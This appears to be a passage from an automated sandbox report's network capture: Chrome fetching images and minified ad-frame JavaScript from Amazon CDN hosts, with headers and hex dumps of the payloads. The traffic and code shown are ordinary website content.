                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC4937INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 b0 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 07 08 03 04 09 01 02 10 00 02 01 03 02 04 03 04 05 06 0b 09 00 00 00 00 01 02 03 00 04 11 05 12 06 13 21 31 07 22 41 14 32 51 92 08 17 42 54 61 15 23 71 72 a1 b1 16 24 34 52
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1"A2QBTa#qr$4R


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      25192.168.2.54974918.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC418OUTGET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC895INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                      Content-Length: 14256
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 3ce271c3-e803-426f-892f-cf74ab1cda03
                                                                                                                                                                                                                                                                      Date: Mon, 13 Nov 2023 23:38:38 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 01 Jun 2023 22:09:04 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-472,/images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy
                                                                                                                                                                                                                                                                      Expires: Sun, 08 Nov 2043 23:38:38 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-472 /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 7d758b616f5473c7b4bee1c49ecfa98a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 24257522
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: Sfub3HqRtCDJVnKMSBtfiWCJCDs40S-0ns2_-jgpucwyfh77R_ZtfQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC14256INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 5e 00 00 01 c2 08 03 00 00 00 90 51 51 10 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 02 f4 50 4c 54 45 47 70 4c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d4 d4 8d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 91 8b 49 94 c1 43 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 98 98 98 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 99 cc 33 ff ff ff 10 10 10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR^QQgAMAasRGBPLTEGpLIC3


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      26192.168.2.54975018.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC413OUTGET /images/G/39/Associates/BTS24_AE_GW_SWM_ADIB_400x39_EN._CB567042873_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC884INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 11994
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 833aa726-a219-4c2b-b5d9-c0ab378cb673
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 20:00:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 15 Aug 2024 17:09:41 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-177,/images/G/39/Associates/BTS24_AE_GW_SWM_ADIB_400x39_EN
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 20:00:00 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-177 /images/G/39/Associates/BTS24_AE_GW_SWM_ADIB_400x39_EN
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 31d06ae261b40b074730272856c3fe20.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 425790
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: dyKYTU334ta2egY7EI12psccath-e9a-j2FMK6gwKxjHrBS0AZ5z4g==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC11994INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                                      Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      27192.168.2.549751151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC445OUTGET /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 42614
                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 2a524287-55bd-4138-93c2-ca41d7d24eaf
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 08 Aug 2024 18:29:52 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Expires: Tue, 04 Feb 2025 18:30:43 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 1122076
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100070-IAD, cache-ewr-kewr1740036-EWR
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 65 3d 3e 65 2b 22 5f 46 65 65 64 62 61 63 6b 22 3b 63 6c 61 73 73 20 74 7b 61 73 79 6e 63 20 61 64 64 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 57 69 74 68 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 65 2c 74 29 7b 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 54 6f 28 74 68 69 73 2e 70 61 72 65 6e 74 48 74 6d 6c 49 64 2c 74 68 69 73 29 3b 63 6f 6e 73 74 20 61 3d 61 77 61 69 74 20 74 2e 67 65 74 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 41 6e 64 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 74 68 69 73 2e 75 72 6c 50 61 74 68 41 6e 64 50 61 72 61 6d 65 74 65 72 29 3b 69 66 28 21 28 6e 75 6c 6c 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 69 73 4f 6b 28 29 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 60 52 65 73 75 6c 74 20 66 72
                                                                                                                                                                                                                                                                      Data Ascii: (()=>{const e=e=>e+"_Feedback";class t{async addSponsoredLabelWithFeedbackLink(e,t){e.appendChildTo(this.parentHtmlId,this);const a=await t.getSponsoredLabelAndFeedbackLink(this.urlPathAndParameter);if(!(null==a?void 0:a.isOk()))throw new Error(`Result fr
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 28 65 29 7b 65 2e 6c 61 62 65 6c 52 65 6e 64 65 72 65 64 43 72 65 61 74 69 76 65 28 29 7d 72 65 6d 6f 76 65 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 41 6e 64 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 74 29 7b 74 72 79 7b 76 61 72 20 61 3b 6e 75 6c 6c 3d 3d 3d 28 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 28 74 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 7c 7c 61 2e 72 65 6d 6f 76 65 28 29 7d 63 61 74 63 68 28 6e 29 7b 69 28 22 55 6e 61 62 6c 65 20 74 6f 20 72 65 6d 6f 76 65 20 41 64 46 65 65 64 62 61 63 6b 20 44 69 76 22 2c 6e 29 7d 7d 6c 6f 67 54 72 61 6e 73 70 61 72 65 6e 63 79 49 6e 66 6f 4d 69 73 73 69 6e 67 28 65 29 7b 65 2e 74 72 61 6e 73 70 61 72 65 6e 63 79 49 6e 66 6f 4d 69 73 73 69 6e 67 28 29 7d 63 6f 6e 73
                                                                                                                                                                                                                                                                      Data Ascii: (e){e.labelRenderedCreative()}removeSponsoredLabelAndFeedbackLink(t){try{var a;null===(a=document.getElementById(e(t)))||void 0===a||a.remove()}catch(n){i("Unable to remove AdFeedback Div",n)}}logTransparencyInfoMissing(e){e.transparencyInfoMissing()}cons
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 63 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 2c 65 2e 63 6f 75 6e 74 29 7d 29 29 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 74 26 26 67 28 22 22 2e 63 6f 6e 63 61 74 28 62 28 65 29 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 74 29 2c 61 29 7d 3b 6c 28 65 2c 74 2e 69 64 2c 61 29 2c 6c 28 65 2c 75 28 74 2e 69 64 29 2c 61 29 2c 6c 28 65 2c 70 28 74 2e 6e 61 6d 65 29 2c 61 29 2c 6c 28 65 2c 6d 28 70 28 74 2e 6e 61 6d 65 29 29 2c 61 29 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 6e 2c 69 2c 72 2c 73 2c 6f 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 21 77 28 29 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 61 3d 77 69 6e 64 6f 77 2e 73 61 66 65
                                                                                                                                                                                                                                                                      Data Ascii: c,e.placement,e.count)}));var l=function(e,t,a){t&&g("".concat(b(e),":").concat(t),a)};l(e,t.id,a),l(e,u(t.id),a),l(e,p(t.name),a),l(e,m(p(t.name)),a)},v=function(e,t){var a,n,i,r,s,o;if(void 0===t&&(t=1),!w())return window.safeframe=null!==(a=window.safe
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 65 66 72 61 6d 65 2e 63 73 61 45 76 65 6e 74 2e 31 22 2c 6d 65 74 72 69 63 4e 61 6d 65 3a 65 2b 22 3a 22 2b 74 2e 6e 61 6d 65 2b 22 3a 22 2b 74 2e 69 64 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 61 7d 2c 7b 65 6e 74 3a 22 61 6c 6c 22 7d 29 7d 63 61 74 63 68 28 6e 29 7b 69 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6c 6f 67 43 73 61 45 76 65 6e 74 27 20 43 53 41 22 2c 6e 29 7d 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 45 76 65 6e 74 73 22 2c 7b 70 72 6f 64 75 63 65 72 49 64 3a 22 61 64 70 6c 61 63 65 6d 65 6e 74 73 22 7d 29 28 22 6c 6f 67 22 2c 7b 73 63 68 65 6d 61 49 64 3a 22 41 70 65 53 61 66 65 66 72 61
                                                                                                                                                                                                                                                                      Data Ascii: eframe.csaEvent.1",metricName:e+":"+t.name+":"+t.id,metricValue:a},{ent:"all"})}catch(n){i("Error with 'logCsaEvent' CSA",n)}},I=function(e,t){if(void 0===t&&(t=1),window.csa)try{window.csa("Events",{producerId:"adplacements"})("log",{schemaId:"ApeSafefra
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 74 20 74 2e 6a 73 6f 6e 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 46 28 65 2e 73 74 61 74 75 73 2c 65 2e 68 74 6d 6c 2c 65 2e 73 63 72 69 70 74 29 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 65 74 63 68 20 74 68 65 20 66 65 65 64 62 61 63 6b 20 68 74 6d 6c 2f 6c 69 6e 6b 2f 73 63 72 69 70 74 2f 6c 61 62 65 6c 22 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 77 69 6e 64 6f 77 52 65 70 6f 3d 65 7d 7d 63 6c 61 73 73 20 55 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 68 69 73 2e 77 65 62 6c 61 62 73 57 69 6e 64 6f 77 3d 65 2c 74 68 69 73 2e 70 72 65 66 69 78 3d 74 2c 74 68 69 73 2e 69 73 54 31 3d 28 29 3d 3e 22 74 31 22 3d 3d 3d 74 68 69 73 2e 77 65 62 6c 61 62 54 72 65 61 74 6d 65 6e 74 28 29 2c
                                                                                                                                                                                                                                                                      Data Ascii: t t.json();return new F(e.status,e.html,e.script)}throw Error("Could not fetch the feedback html/link/script/label")}constructor(e){this.windowRepo=e}}class U{constructor(e,t){this.weblabsWindow=e,this.prefix=t,this.isT1=()=>"t1"===this.weblabTreatment(),
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 2e 6c 61 62 65 6c 54 65 78 74 2c 56 28 74 2c 65 2e 6c 61 62 65 6c 53 74 79 6c 65 29 2c 74 7d 28 74 29 29 2c 61 7d 31 3d 3d 3d 74 2e 70 6f 73 69 74 69 6f 6e 3f 6e 75 6c 6c 3d 3d 3d 28 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 7c 7c 61 2e 70 72 65 70 65 6e 64 28 69 28 65 2c 74 29 29 3a 30 3d 3d 3d 74 2e 70 6f 73 69 74 69 6f 6e 26 26 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 7c 7c 76 6f 69 64 20 30 3d
                                                                                                                                                                                                                                                                      Data Ascii: function(e){const t=document.createElement("div");return t.innerHTML=e.labelText,V(t,e.labelStyle),t}(t)),a}1===t.position?null===(a=document.getElementById(e))||void 0===a||a.prepend(i(e,t)):0===t.position&&(null===(n=document.getElementById(e))||void 0=
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 64 65 3a 22 53 45 22 2c 68 6f 73 74 6e 61 6d 65 3a 22 77 77 77 2e 61 6d 61 7a 6f 6e 2e 73 65 22 2c 6e 61 6d 65 3a 22 53 77 65 64 65 6e 22 7d 2c 74 65 3d 65 3d 3e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 3d 3d 3d 65 2e 68 6f 73 74 6e 61 6d 65 2c 61 65 3d 65 3d 3e 21 28 74 65 28 6a 29 7c 7c 74 65 28 4a 29 7c 7c 74 65 28 59 29 7c 7c 74 65 28 51 29 7c 7c 74 65 28 4b 29 7c 7c 74 65 28 58 29 7c 7c 74 65 28 5a 29 7c 7c 74 65 28 65 65 29 29 7c 7c 6e 65 28 65 29 2c 6e 65 3d 65 3d 3e 7b 76 61 72 20 74 2c 61 2c 6e 2c 72 2c 73 2c 6f 3b 63 6f 6e 73 74 20 64 3d 5b 5d 3b 72 65 28 6e 75 6c 6c 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 75 72 6c 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 7c 7c 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 2e 70 61 72 61 6d 65 74 65 72 73
                                                                                                                                                                                                                                                                      Data Ascii: de:"SE",hostname:"www.amazon.se",name:"Sweden"},te=e=>location.hostname===e.hostname,ae=e=>!(te(j)||te(J)||te(Y)||te(Q)||te(K)||te(X)||te(Z)||te(ee))||ne(e),ne=e=>{var t,a,n,r,s,o;const d=[];re(null==e||null===(n=e.url)||void 0===n||null===(a=n.parameters
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 7a 28 29 2e 69 73 54 31 28 29 3f 32 3a 7a 28 29 2e 69 73 54 32 28 29 3f 34 3a 7a 28 29 2e 69 73 54 33 28 29 3f 38 3a 7a 28 29 2e 69 73 54 34 28 29 3f 31 36 3a 7a 28 29 2e 69 73 54 35 28 29 3f 33 32 3a 31 2c 6f 65 3d 65 3d 3e 6d 65 28 65 29 2c 64 65 3d 2f 5e 28 5b 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 5d 7b 34 7d 29 2a 28 5b 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 5d 7b 33 7d 3d 7c 5b 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 5d 7b 32 7d 3d 3d 29 3f 24 2f 2c 6c 65 3d 65 3d 3e 64 65 2e 74 65 73 74 28 65 29 2c 63 65 3d 65 3d 3e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 29 29 2c 6d 65 3d 65 3d 3e 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 65 29 29 29 2c 75 65 3d 28 29
                                                                                                                                                                                                                                                                      Data Ascii: z().isT1()?2:z().isT2()?4:z().isT3()?8:z().isT4()?16:z().isT5()?32:1,oe=e=>me(e),de=/^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)?$/,le=e=>de.test(e),ce=e=>btoa(unescape(encodeURIComponent(e))),me=e=>decodeURIComponent(escape(atob(e))),ue=()
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1378INData Raw: 5b 65 2e 69 64 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 7d 2c 74 68 69 73 2e 67 65 74 42 79 50 6c 61 63 65 6d 65 6e 74 3d 65 3d 3e 74 68 69 73 2e 67 65 74 42 79 50 6c 61 63 65 6d 65 6e 74 44 69 76 28 65 2e 64 69 76 29 2c 74 68 69 73 2e 73 61 76 65 3d 65 3d 3e 7b 74 68 69 73 2e 6c 69 67 68 74 41 64 57 69 6e 64 6f 77 2e 6c 69 67 68 74 41 64 73 5b 65 2e 70 6c 61 63 65 6d 65 6e 74 2e 64 69 76 2e 69 64 5d 3d 65 7d 2c 77 65 28 65 29 7d 7d 63 6f 6e 73 74 20 77 65 3d 65 3d 3e 7b 65 2e 6c 69 67 68 74 41 64 73 7c 7c 28 65 2e 6c 69 67 68 74 41 64 73 3d 7b 7d 29 7d 2c 67 65 3d 28 29 3d 3e 6e 65 77 20 76 65 28 77 69 6e 64 6f 77 29 2c 66 65 3d 65 3d 3e 67 65 28 29 2e 67 65 74 42 79 50 6c 61 63 65 6d 65 6e 74 44 69 76 28 65 29 2e 6c 69 67 68 74 41
                                                                                                                                                                                                                                                                      Data Ascii: [e.id])&&void 0!==t?t:null},this.getByPlacement=e=>this.getByPlacementDiv(e.div),this.save=e=>{this.lightAdWindow.lightAds[e.placement.div.id]=e},we(e)}}const we=e=>{e.lightAds||(e.lightAds={})},ge=()=>new ve(window),fe=e=>ge().getByPlacementDiv(e).lightA


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      28192.168.2.549752151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC443OUTGET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC1330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 48888
